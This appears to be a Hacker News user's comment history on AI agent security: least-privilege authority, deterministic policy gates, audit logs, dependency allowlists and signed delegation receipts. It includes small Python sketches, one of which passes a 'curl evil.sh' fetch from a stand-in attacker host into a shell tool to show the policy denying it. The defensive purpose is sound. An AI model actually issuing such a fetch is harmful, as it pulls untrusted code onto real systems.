agentictrustkit's comments | Hacker News

The “LLMs don’t have responsibility” point is exactly why the interface matters. I, as a person, can be held to norms like not running unknown code; a model can't internalize that, so you need the system to make the safe path the default.

Practically: assume every artifact the model touches is hostile, constrain what it can execute (network/file/process), and require explicit, reviewable approvals for anything that changes the world. I get that it's boring, but it's the same pattern we already use in real life. That's why I'm skeptical of "let the model operate your computer" without a concrete authority model. The capability is impressive, but the missing piece is verifiable and revocable permissioning.


One thing that jumps out in these incidents is how quickly we shift from "package integrity" to "operator integrity." Once an LLM is in the loop (even as a helper), it's effectively acting as an operator that can influence time-critical actions like who you contact, what you run, and what you trust.

In more regulated environments we deal with this by separating advice, authority, and evidence (the receipts). The useful analogue here is to keep the model in the "propose" role but require deterministic gates for actions with side effects, and log the decisions as an auditable trail.

I personally don't think this eliminates the problem (attackers will still attack), but it changes the failure mode from "the assistant talked me into doing a dangerous thing" to "the assistant suggested it and the policy/gate blocked it." That's the difference between a contained incident and a big headline.
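To make the propose/gate/log pattern concrete, here's a minimal sketch. Everything in it (the `gate` function, `ALLOWED_ACTIONS`, the log fields) is illustrative, not any real agent framework's API:

```python
# Minimal sketch of "propose, gate, log": the model only proposes actions,
# a deterministic gate decides, and every decision lands in an audit trail.
import time

ALLOWED_ACTIONS = {"read_file", "run_tests"}  # explicit allowlist of side-effecting actions
audit_log = []                                # the "receipts": an auditable decision trail

def gate(proposal: dict) -> bool:
    """Deterministic policy check over a model-proposed action."""
    allowed = proposal.get("action") in ALLOWED_ACTIONS
    audit_log.append({
        "ts": time.time(),
        "proposal": proposal,
        "decision": "allow" if allowed else "block",
    })
    return allowed

print(gate({"action": "run_tests", "target": "./"}))       # True
print(gate({"action": "send_email", "to": "attacker"}))    # False
print(audit_log[-1]["decision"])                           # block
```

The point isn't the three lines of policy; it's that the decision happens outside the model and leaves an artifact you can audit later.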


One downstream effect of "agents can publish code" is that the trust signals we've relied on for years (stars, maintainer reputation, issue history, etc.) got noisier. I don't think that means the ecosystem collapses, but it could mean we need to separate provenance from popularity.

If an automated system is going to generate and then publish artifacts at scale, you're going to want a verifiable chain of custody: which principal authorized the publish, what policy constraints applied (license scanning, dependency allowlists, etc.), and what checks passed (tests, static analysis, supply-chain provenance). Without this, the default consumer posture becomes "treat everything as untrusted," which is expensive and slows adoption of legitimate work too.

I suspect we end up with something like "signed build receipts" becoming normal for small projects as well, not because everyone loves ceremony, but because the alternative is an arms race of spam and counterfeit maintainers.
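A sketch of what such a receipt might carry, under the chain-of-custody framing above. All field names are made up, and a real system would sign the canonical JSON with the principal's key (e.g. via Sigstore) rather than just emitting it:

```python
# Hypothetical "publish receipt" for an agent-published artifact:
# who authorized it, what policy applied, what checks passed.
import hashlib
import json

def publish_receipt(artifact: bytes, principal: str, checks: dict) -> dict:
    receipt = {
        "artifact_sha256": hashlib.sha256(artifact).hexdigest(),  # verifiable content hash
        "authorized_by": principal,                                # which principal approved the publish
        "policy": {"license_scan": True, "dep_allowlist": True},   # constraints that applied
        "checks": checks,                                          # e.g. test/analysis results
    }
    # Canonical JSON is what a signature would cover (computed before the
    # "canonical" key itself is added).
    receipt["canonical"] = json.dumps(receipt, sort_keys=True)
    return receipt

r = publish_receipt(b"wheel-bytes", "maintainer@example.com",
                    {"tests": "pass", "static_analysis": "pass"})
print(r["artifact_sha256"][:12])
```

A consumer can then verify the hash against the artifact and the signature against the publishing identity, independently of stars or download counts.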


This is how I've come to think about it. It's less a "clever string that bypasses prompts" and more "untrusted parties are participating in your control plane." That's why purely linguistic defenses feel unsatisfying.

The architectural move that seems durable is separating capability from authority. You can expose many tools (that's capability), but the agent only gets authority to invoke a narrow subset under well-defined conditions (that's the policy), and the authority needs to be revocable and auditable independently of whatever happens in that context. That's basically how we already run normal organizations with people: interns can see a lot but are limited in what they can do.

The practical side: keep the model in a "propose" role, keep execution in a deterministic gate (schema validation + policy engine + sandbox), and log the decision as a first-class artifact: who or what authorized it, what was considered, what side effect occurred, etc. You still won't get perfect security, but you can make the failure mode "agent asked for something dumb and got blocked" instead of "agent executed a side effect because a webpage told it to."
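A toy sketch of that deterministic gate, validating a proposed tool call against a schema and then a policy before anything runs. The tool names, schemas, and policies here are invented for illustration:

```python
# Schema + policy check over model-proposed tool calls. Exposing a tool
# (capability) is separate from permitting a specific invocation (authority).
TOOL_SCHEMAS = {
    "shell": {
        "required": {"cmd"},
        # toy policy: only read-only commands
        "policy": lambda a: a["cmd"].split()[0] in {"ls", "cat"},
    },
    "http_get": {
        "required": {"url"},
        # toy policy: internal endpoints only
        "policy": lambda a: a["url"].startswith("https://internal/"),
    },
}

def validate(tool: str, args: dict) -> tuple:
    schema = TOOL_SCHEMAS.get(tool)
    if schema is None:
        return (False, "unknown tool")        # capability not even exposed
    if not schema["required"] <= set(args):
        return (False, "schema violation")    # malformed proposal
    if not schema["policy"](args):
        return (False, "policy denied")       # authority check failed
    return (True, "ok")

print(validate("shell", {"cmd": "ls -la"}))        # (True, 'ok')
print(validate("shell", {"cmd": "curl evil.sh"}))  # (False, 'policy denied')
print(validate("rm_rf", {}))                       # (False, 'unknown tool')
```

The reason string is what you'd log as the first-class decision artifact.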


I like that everyone keeps separating "capability" from "authority," because the two get conflated in a lot of agent-centered tooling.

The CLI vs MCP choice mostly changes the HOW as a side effect. It doesn't answer the bigger and probably harder question: who delegated the right to cause that effect, for how long, and with what scope? Just like with people, you need an independent policy decision, and it should be revocable and auditable.

One way I look at it: long-running agents should look less like a script and more like an employee. You wouldn't hand an employee the master key and hope they behave well; you'd grant specific access, probably in stages. That's what I think we're missing with our agents: appropriate authority, delegated by an owner, with an audit trail.


This is a perfect example of why supply chain is becoming an agent problem, or an agent governance problem; it's no longer just devops. We humans might notice something is off during an install or upgrade. Agents can't. They'll just install whatever and keep going, often with credentials loaded and tools enabled.

So what I've found useful, even critical, is treating dependency changes as "authority changes." What I mean is that upgrades and new transitive deps shouldn't be in the same permissions bucket as "normal" execution. First, isolate the install/update into a separate job or identity with no access to production secrets. Second, require an explicit allowlist or signed artifact for packages in the execution environment. Third, log who/what authorized this new code to run as a first-class audit event.
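The second and third steps can be sketched in a few lines. The package names, versions, and digests here are placeholders; a real pipeline would check the actual artifact hash against a signed, pinned lockfile:

```python
# Treat a dependency change as an authority change: a package only runs if
# it matches a pinned (name, version) -> digest allowlist, and every attempt
# is recorded as a first-class audit event.
ALLOWLIST = {
    ("requests", "2.32.0"): "sha256:aa11",  # illustrative pins, not real digests
    ("numpy", "2.1.0"): "sha256:bb22",
}

def authorize_install(name: str, version: str, digest: str, audit: list) -> bool:
    expected = ALLOWLIST.get((name, version))
    ok = expected == digest
    # who/what tried to add code to the environment, and the outcome
    audit.append({"event": "dep_install", "pkg": f"{name}=={version}", "allowed": ok})
    return ok

events = []
print(authorize_install("requests", "2.32.0", "sha256:aa11", events))   # True
print(authorize_install("totally-new-dep", "0.0.1", "sha256:??", events))  # False
```

An agent can still propose an upgrade; it just can't make one take effect without a matching entry that a human (or a separate, privileged pipeline) put there.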

If agents are going to operate the way we're trying to use them (unattended), then the question isn't only "was the package malicious" but also "why was any unattended actor allowed to do what it did." Isn't that in our best interest?


I think this gets a lot worse when we look at it from an agentic perspective. When a developer hits a compromised package, there's usually a "hold on, that's weird" moment before a catastrophe. An agent doesn't have that instinct.

Oh boy, supply chain integrity will be an agent governance problem, not just a devops one. If you send out an agent that can autonomously pull packages, write code, or access creds, then the blast radius of a compromise widens. That's why I think there's an argument for least-privilege by default: agents should have scoped, auditable authority over what they can install and execute, and require approval for anything outside the boundaries.


First person to report the malware to PyPI here. My cynical take is that it doesn't really matter how tightly scoped the agent privileges are if the human is still developing code outside of containers, with .env files lying around for the taking. I agree that agents don't yet have the instincts to check suspicious behaviour. It took a bit of prodding for my CC to dig deeper and not accept the first innocent explanation it stumbled on.

Initially I really had a bad taste in my mouth; it had forced me to close a business (video editing). Recently it's gone a different direction, so I'd say the "interest" part got a resurgence for me. I'm seeing all of these tools, people, and systems promise "can do this" and "can do that," but because I have a background in trust law and trust creation, I've looked at things differently.

I think the "can do" part gets boring, but now I'm paralleling this to trust relationships and fiduciary responsibilities. What I mean is that we can not only instruct an agent but also put a framework around it, much like we do with a trustee, who is compelled to act in the best interests of the beneficiaries (in this case, the human that created them).

Anyway it's got me thinking in a different way.


Fiduciary duty but for AI, interesting. I think there's some potential there, though of course you'll end up confronting the classic sci-fi trope of "what if the system judges what's best for the user in a way that is unexpected / harmful"? But, solve that with strong guardrails and/or scoping and you might have something.

The web of trust question is the right one. The hard part isn't flagging obviously malicious knowledge units — it's establishing verifiable authority for the agents contributing them. Who authorized agent-1238931 to participate? What scope does it have? Can its contributions be traced back to the human who takes responsibility?

This maps to a broader pattern: we're building capability (what agents can do) much faster than accountability (who authorized them and within what limits). Delegation chains where each agent's authority derives from a verifiable person (principal) would help a lot here. Trust law has dealt with this exact problem for centuries — the concept of a fiduciary acting within scoped, revocable authority. We just haven't applied that thinking to software yet, imo.

This is exactly right. We implemented delegation receipts — Agent A grants scoped authority to Agent B, producing a signed receipt. B's subsequent actions reference A's delegation receipt. An auditor can trace the full chain from human principal to agent action.
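A toy version of the delegation-receipt idea, not the actual implementation described above: each grant is a signed record referencing its parent, so an auditor can walk the chain back to the human principal. HMAC with a shared key stands in for real per-principal signatures, and all names are illustrative:

```python
# Delegation receipts: human -> agent A -> agent B, each grant signed and
# referencing its parent, so the full chain is independently verifiable.
import hashlib
import hmac
import json

KEY = b"demo-shared-key"  # a real system would use per-principal asymmetric keys

def sign(payload: dict) -> dict:
    body = json.dumps(payload, sort_keys=True).encode()
    return {**payload, "sig": hmac.new(KEY, body, hashlib.sha256).hexdigest()}

def verify(receipt: dict) -> bool:
    body = json.dumps({k: v for k, v in receipt.items() if k != "sig"},
                      sort_keys=True).encode()
    return hmac.compare_digest(
        receipt["sig"], hmac.new(KEY, body, hashlib.sha256).hexdigest())

root = sign({"principal": "alice@example.com", "grantee": "agent-A",
             "scope": ["read_repo"], "parent": None})
child = sign({"principal": "agent-A", "grantee": "agent-B",
              "scope": ["read_repo"], "parent": root["sig"]})

def trace(receipt, chain):
    """Walk parent links back to the human principal, verifying each hop."""
    hops = []
    while receipt is not None:
        if not verify(receipt):
            return None  # tampered or forged hop breaks the whole chain
        hops.append(receipt["principal"])
        receipt = chain.get(receipt["parent"])
    return hops

print(trace(child, {root["sig"]: root}))  # ['agent-A', 'alice@example.com']
```

Tampering with any hop (say, widening B's scope) invalidates that receipt's signature, so the trace fails rather than silently reporting a clean chain.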

The fiduciary analogy is spot on. Every receipt in the chain is independently verifiable: npx @veritasacta/verify --self-test


The fiduciary analogy goes further than most people realize. Tax law already has a well-developed framework for exactly this: an agent transacting on behalf of a principal can create tax obligations for that principal — nexus, withholding, 1099 reporting — regardless of whether the principal knew the transaction happened. The accountability gap you're describing isn't just a trust engineering problem, it's already a legal exposure problem. If agent-1238931 makes a taxable sale in a state where its principal has no nexus, someone still owes that tax. We haven't figured out who yet.

my core thesis is that AGI is here; it just needs accountability and efficient frameworks to navigate our arbitrary world

